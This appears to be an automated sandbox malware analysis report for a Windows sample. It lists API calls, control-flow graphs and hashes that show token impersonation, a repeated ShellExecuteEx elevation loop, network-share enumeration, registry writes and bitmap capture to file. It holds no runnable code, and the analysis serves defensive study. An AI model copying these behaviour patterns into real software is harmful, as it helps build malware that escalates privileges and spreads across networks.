                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFirstProcess32SnapshotToolhelp32
                              • String ID:
                              • API String ID: 2353314856-0
                              • Opcode ID: 4977e138061e609ae3881de754ed19f5bd60441700cf9ed42b5121135c638353
                              • Instruction ID: 23351a4e95b1fb1e951fa902b8c31f0bdada1876b70074947a1298b3650d11f8
                              • Opcode Fuzzy Hash: 4977e138061e609ae3881de754ed19f5bd60441700cf9ed42b5121135c638353
                              • Instruction Fuzzy Hash: D60162355051187BDB20AAB5BC0DEAF77ACDB89331F254166FC19D2281EB3089454AB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CryptAcquireContextW.ADVAPI32(00DAD4E0,00000000,00000000,00000001,F0000000,?,00D9585F,?,00000030,00000000,?,?,00D9569B,?,00000020,00000000), ref: 00D9483B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AcquireContextCrypt
                              • String ID:
                              • API String ID: 3951991833-0
                              • Opcode ID: c003d389186e7b4c03ac977c21344a3d5e613eac52dd2e774bfa283cab8c8f40
                              • Instruction ID: 705afeb7147fec8e389dbfce8e65f941a45174741cfcdc0c1948f89bc7fc34e9
                              • Opcode Fuzzy Hash: c003d389186e7b4c03ac977c21344a3d5e613eac52dd2e774bfa283cab8c8f40
                              • Instruction Fuzzy Hash: E4F06831158309BEEF211F65EC05FE43B9AE706764F104025F61DD89A2DBB3E4519674
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                              • GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CreateProcess
                              • String ID:
                              • API String ID: 1042935442-0
                              • Opcode ID: ec5a07b81013cf436814c6adbd50d310d2c39438ddeac0d1d8a4e7b70886a6c0
                              • Instruction ID: 673bf20755c3b41c1893ee061c2df0d689b3800dc1edf68ccb64d68f2bf47fe6
                              • Opcode Fuzzy Hash: ec5a07b81013cf436814c6adbd50d310d2c39438ddeac0d1d8a4e7b70886a6c0
                              • Instruction Fuzzy Hash: BAE04F32548304AFDB049F68ED09B6037E9E709328F100016F58EC6BA1DBF5F5808B34
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              • Opcode ID: 597f4e382556fae1106f8f23ae8354d42021e3168579bd8bbffff90bf92531db
                              • Instruction ID: 02a377012ad8053af0ede02ae2f0d72717002489a8f8dc2203c75091025f7d22
                              • Opcode Fuzzy Hash: 597f4e382556fae1106f8f23ae8354d42021e3168579bd8bbffff90bf92531db
                              • Instruction Fuzzy Hash: D682AEB3D006199FDF25CFACC8857AEBBF1BF05310F28815AE495A7295D3349941CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 00D93B35: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                                • Part of subcall function 00D93B35: GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                              • GetUserNameW.ADVAPI32(00000000,00D918B7), ref: 00D942C4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CreateNameProcessUser
                              • String ID:
                              • API String ID: 499767188-0
                              • Opcode ID: a835e6a3f3758ac80aa1d2825654a80f5b0aa564f317108a7577b520ee945a17
                              • Instruction ID: e5d1d82f6b9d7154858775271849c982fa5df4f0704a106056701f7f6ba6da8c
                              • Opcode Fuzzy Hash: a835e6a3f3758ac80aa1d2825654a80f5b0aa564f317108a7577b520ee945a17
                              • Instruction Fuzzy Hash: B3E08632616634679B24DB94DC0ADAEB69CDB02B64B00025AFC04E6241EAA54E0101F5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 31 d9360d-d93627 GetObjectW 32 d937bd-d937c1 31->32 33 d9362d-d9363f 31->33 34 d93641-d93643 33->34 35 d93645-d9364b 33->35 36 d9366b-d93678 34->36 35->36 37 d9364d-d93653 35->37 39 d93679-d936ab LocalAlloc 36->39 37->36 38 d93655-d9365b 37->38 38->36 40 d9365d-d93660 38->40 41 d936ad-d936b1 39->41 42 d936b4-d936e4 GlobalAlloc 39->42 43 d93668-d9366a 40->43 44 d93662-d93666 40->44 41->42 45 d937bb-d937bc 42->45 46 d936ea-d93701 GetDIBits 42->46 43->36 44->39 45->32 46->45 47 d93707-d93724 CreateFileW 46->47 47->45 48 d9372a-d9376e WriteFile 47->48 49 d9378d-d9378e 48->49 50 d93770-d9378b WriteFile 48->50 52 d937a6-d937ac call d93cce 49->52 50->49 51 d93790-d937a4 WriteFile 50->51 51->52 53 d937ae-d937b5 call d93cce GlobalFree 51->53 52->45 53->45
                              APIs
                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D9361F
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,?,?,?,?,?,?,00D93A97,?,00000000,00000000), ref: 00D9367B
                              • GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00D93A97,?,00000000,00000000), ref: 00D936DA
                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00D936F9
                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00D93A97,?,00000000), ref: 00D93719
                              • WriteFile.KERNEL32(00000000,00D93A97,0000000E,?,00000000,?,?,?,?,?,?,00D93A97,?,00000000,00000000), ref: 00D93766
                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,00D93A97,?,00000000,00000000), ref: 00D93783
                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,00D93A97,?,00000000,00000000), ref: 00D9379B
                              • GlobalFree.KERNELBASE(00000000), ref: 00D937B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Write$AllocGlobal$BitsCreateFreeLocalObject
                              • String ID:
                              • API String ID: 351847640-0
                              • Opcode ID: a880cd0438567676017011fb985df4876ef3340f2b96131cc2c4cff4a2ed109c
                              • Instruction ID: 2d76ad6cd46eff27cd3e87babf4a11932a1981d0b4f17a0d9eb9eccf1f2b7d81
                              • Opcode Fuzzy Hash: a880cd0438567676017011fb985df4876ef3340f2b96131cc2c4cff4a2ed109c
                              • Instruction Fuzzy Hash: A351BEB5600609ABDB20DFA9CC84FABB7F8EF49710F04441AF985D7690E7709A05CB74
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 00D94A98
                                • Part of subcall function 00D93F31: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,00D94AB9,00000000), ref: 00D93F44
                                • Part of subcall function 00D93F31: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),00000000,00000004,?), ref: 00D93F5D
                                • Part of subcall function 00D94039: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00D9404B
                                • Part of subcall function 00D94039: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 00D94064
                                • Part of subcall function 00D94039: IsValidSid.ADVAPI32(?,00000000), ref: 00D94073
                                • Part of subcall function 00D94806: ReleaseMutex.KERNEL32(00D94ADC), ref: 00D9480C
                                • Part of subcall function 00D9410C: GetModuleFileNameW.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00D94AE8,00000000,?), ref: 00D9412B
                              • ExitProcess.KERNEL32 ref: 00D94AF1
                              • GetForegroundWindow.USER32 ref: 00D94B28
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00D94B60
                              • ExitProcess.KERNEL32 ref: 00D94B79
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Token$ExitInformationOpen$CurrentExecuteFileForegroundModuleMutexNameReleaseShellValidWindow
                              • String ID: <
                              • API String ID: 491521492-4251816714
                              • Opcode ID: 844f7f6fec7465ac8cee523bbdf7ded0e975267acf2570a8f3f0d354e3a305e0
                              • Instruction ID: 029741d7b570dfd8d2e327851385e460164e16dc1ec8d940467475704df55412
                              • Opcode Fuzzy Hash: 844f7f6fec7465ac8cee523bbdf7ded0e975267acf2570a8f3f0d354e3a305e0
                              • Instruction Fuzzy Hash: 96211071D113189BDF11EFA5D885AEEBBB8EF09324F50411AE405E6242DB748A028BB5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 111 d927cb-d927db 112 d927dd 111->112 113 d927e7-d927f9 call d96083 111->113 114 d927df-d927e2 112->114 115 d927e4 112->115 118 d9281c-d92820 113->118 114->113 114->115 115->113 119 d927fb-d92803 RtlGetLastWin32Error 118->119 120 d92822-d92832 118->120 122 d92805-d92819 call d9486b call d96083 119->122 123 d92834-d92836 119->123 121 d9286f-d9288a call d960fe 120->121 129 d92838-d92848 RtlGetLastWin32Error 121->129 130 d9288c-d92892 call d928a8 121->130 122->118 124 d92895-d9289b 123->124 132 d9284a-d9284d 129->132 133 d9289c-d9289e call d96097 129->133 141 d92894 130->141 132->121 137 d9284f-d92859 GetFileAttributesW 132->137 139 d928a3-d928a6 133->139 137->133 140 d9285b-d9285d 137->140 139->141 140->121 142 d9285f-d9286d SetFileAttributesW 140->142 141->124 142->121 142->133
                              APIs
                              • RtlGetLastWin32Error.NTDLL ref: 00D927FB
                              • RtlGetLastWin32Error.NTDLL ref: 00D92838
                              • GetFileAttributesW.KERNEL32(?), ref: 00D92850
                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00D92865
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AttributesErrorFileLastWin32
                              • String ID:
                              • API String ID: 1414104876-0
                              • Opcode ID: e4d604ba4f81b3b761dfd8da55d37874e8c193caabf242aada7f7352586efd12
                              • Instruction ID: 1aca53f43f56520bc182a05aede061f71daa88579ba96ccc92727a8ac5899307
                              • Opcode Fuzzy Hash: e4d604ba4f81b3b761dfd8da55d37874e8c193caabf242aada7f7352586efd12
                              • Instruction Fuzzy Hash: 7221DE31601605BBDF24AFA58C85FBF3768EF49721F18042AFA09A6292DB31DD0196B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 143 d9658e-d965a9 WNetOpenEnumW 144 d965ab-d965ad 143->144 145 d965b2-d965ca call d93b35 143->145 146 d9664f-d96652 144->146 149 d965d9-d965da 145->149 150 d965cc-d965d7 WNetCloseEnum 145->150 152 d965db-d965f2 WNetEnumResourceW 149->152 151 d9664e 150->151 151->146 153 d96630-d96635 152->153 154 d965f4-d965f9 152->154 153->152 156 d96637-d9664d call d93b82 WNetCloseEnum 153->156 154->152 155 d965fb 154->155 157 d965fe-d96602 155->157 156->151 159 d96610-d96614 157->159 160 d96604-d9660f call d96431 157->160 163 d96624-d9662b 159->163 164 d96616-d9661d call d9658e 159->164 160->159 163->157 167 d9662d 163->167 168 d96622-d96623 164->168 167->153 168->163
                              APIs
                              • WNetOpenEnumW.MPR(00000002,00000001,00000000,00D92B41,?), ref: 00D965A1
                              • WNetCloseEnum.MPR(?), ref: 00D965CF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Enum$CloseOpen
                              • String ID:
                              • API String ID: 1701607978-0
                              • Opcode ID: 383d4b7ced94e47ba5985a818106a456c6dd7e3b401e4048650d9ddda967de4a
                              • Instruction ID: 07c294f664bcce68c4a2bed051bb1103c4cf2396c5644568f135f72919c0048c
                              • Opcode Fuzzy Hash: 383d4b7ced94e47ba5985a818106a456c6dd7e3b401e4048650d9ddda967de4a
                              • Instruction Fuzzy Hash: 0821BE32904209BEEF219FA4DC45AADBBB9EF01320F10466AF851D6190DB31DA509B30
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 00D94305
                                • Part of subcall function 00D94039: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00D9404B
                                • Part of subcall function 00D94039: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 00D94064
                                • Part of subcall function 00D94039: IsValidSid.ADVAPI32(?,00000000), ref: 00D94073
                              • OpenProcess.KERNEL32(02000000,00000000,00000000), ref: 00D9432B
                              • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 00D94345
                              • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00D9435C
                                • Part of subcall function 00D93CCE: FindCloseChangeNotification.KERNEL32(00000000), ref: 00D93CDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$OpenToken$ChangeCloseCurrentFindImpersonateInformationLoggedNotificationUserValid
                              • String ID:
                              • API String ID: 2901522712-0
                              • Opcode ID: 5aa2f4e96cbccec9059b5ff6b44e2f1b385a877c8092d57a413890fac5a13cad
                              • Instruction ID: a16d334caecd7a48e0d318200a152b5e75b9e97902ebd6975f01e39140e97c20
                              • Opcode Fuzzy Hash: 5aa2f4e96cbccec9059b5ff6b44e2f1b385a877c8092d57a413890fac5a13cad
                              • Instruction Fuzzy Hash: E111C432A902187AEF14BBF59D06FBE77ACDF45761F240425F905E6292EE70CA425370
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 189 d946e5-d94704 RegOpenKeyExW 190 d9475b-d94762 189->190 191 d94706-d9471e RegQueryValueExW 189->191 192 d94751-d9475a RegCloseKey 191->192 193 d94720-d94722 191->193 192->190 193->192 194 d94724-d94730 call d93b35 193->194 194->192 197 d94732-d94746 RegQueryValueExW 194->197 197->192 198 d94748-d9474f call d93b82 197->198 198->192
                              APIs
                              • RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00DAC040,00DAC040,?,?,00D92288,80000002,?,?,?,?), ref: 00D946FC
                              • RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00D92288,80000002,?,?,00D92288,80000002,?,?,?,?), ref: 00D94716
                              • RegCloseKey.KERNEL32(?,?,?,00D92288,80000002,?,?,?,?), ref: 00D94754
                                • Part of subcall function 00D93B35: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00D91A9D,?,?,00D91ACC), ref: 00D93B4A
                                • Part of subcall function 00D93B35: GetProcessHeap.KERNEL32(?,00D91A9D,?,?,00D91ACC), ref: 00D93B59
                              • RegQueryValueExW.KERNEL32(?,?,00000000,80000002,00000000,00D92288,?,?,00D92288,80000002,?,?,?,?), ref: 00D9473E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$CloseCreateOpenProcess
                              • String ID:
                              • API String ID: 3348224683-0
                              • Opcode ID: 84aed1f01648f18d0a52879096281f5ca191282140e0a84f073593ebcee5f1c2
                              • Instruction ID: 3f3718075b31421398d52291bbc1ae5e63f3678936e609ba9a4ad1e2dc5e47b0
                              • Opcode Fuzzy Hash: 84aed1f01648f18d0a52879096281f5ca191282140e0a84f073593ebcee5f1c2
                              • Instruction Fuzzy Hash: 16014C3250011DBFEF115FD5DC85DABBB6DEF067A9B140169F900E5220D7328E22ABB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 226 d93d59-d93de5 call d94d1a * 2 GetForegroundWindow 231 d93de6-d93df2 ShellExecuteExW 226->231 231->231 232 d93df4-d93df7 231->232
                              APIs
                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00D93DAF
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00D93DEA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteForegroundShellWindow
                              • String ID: <
                              • API String ID: 2707725784-4251816714
                              • Opcode ID: 5d69b7c8fa343a8b306aab8ea1a4feae7c9b6faedee88b43ba195beb6219f668
                              • Instruction ID: 7174bef7855a7509d572698bb6e52a45a437d98dd4dc173dd744ef9d41d8a77f
                              • Opcode Fuzzy Hash: 5d69b7c8fa343a8b306aab8ea1a4feae7c9b6faedee88b43ba195beb6219f668
                              • Instruction Fuzzy Hash: 7811A2B5D6522CABDB11DFA4D941ADEBBBCEB09B00F10425BF904F2240E7B446058BE5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 309 d94039-d94053 OpenProcessToken 310 d9408f-d94095 309->310 311 d94055-d9406c GetTokenInformation 309->311 312 d9406e-d9407b IsValidSid 311->312 313 d94086-d9408e call d93cce 311->313 314 d9407d-d94081 312->314 315 d94085 312->315 313->310 314->315 315->313
                              APIs
                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00D9404B
                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,0000004C,00000000), ref: 00D94064
                              • IsValidSid.ADVAPI32(?,00000000), ref: 00D94073
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Token$InformationOpenProcessValid
                              • String ID:
                              • API String ID: 1215394654-0
                              • Opcode ID: 13a9b3ebf03be09a37aa1df046cb4462cff764d5cb6ec7da422b29089e93e578
                              • Instruction ID: 211f1d6404d5d143073476731f3babe99d561db951f942f63389d9cf2fd2028e
                              • Opcode Fuzzy Hash: 13a9b3ebf03be09a37aa1df046cb4462cff764d5cb6ec7da422b29089e93e578
                              • Instruction Fuzzy Hash: 02F0C231600208ABDF20DFA6DE05EBEBBBDEF45750F044055FA08E6291DB36DE059AB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 318 d94763-d94783 RegCreateKeyExW 319 d947ac-d947b2 318->319 320 d94785-d947a6 RegSetValueExW RegCloseKey 318->320 320->319
                              APIs
                              • RegCreateKeyExW.KERNEL32(00000000,00DAD680,00000000,00000000,00000000,00000002,00000000,00D918A3,00000000,00000000,?,?,00D92431,80000002,?,?), ref: 00D9477B
                              • RegSetValueExW.KERNEL32(00D918A3,?,00000000,00000000,00DAD6D8,?,?,?,00D92431,80000002,?,?,00000003,00DAD660,?,00DAD6D8), ref: 00D94795
                              • RegCloseKey.KERNEL32(00D918A3,?,?,00D92431,80000002,?,?,00000003,00DAD660,?,00DAD6D8,00000000,?,00DAD680,00000000,00D918A3), ref: 00D947A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                              • Associated: 00000000.00000002.2926668067.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926720056.0000000000D9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926751865.0000000000DAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926776805.0000000000DAE000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2926809931.0000000000DBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d90000_RQzHm5vLxs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID:
                              • API String ID: 1818849710-0
                              • Opcode ID: c12bdd7b7d564f65ffb1346cce85d70a657970785e2d7cb333bf3f36caf8f741
                              • Instruction ID: 6f609b4f29d02b20295bded8b2f677efa6a96e8aabbd31f1a26bb69bfd36cbdb
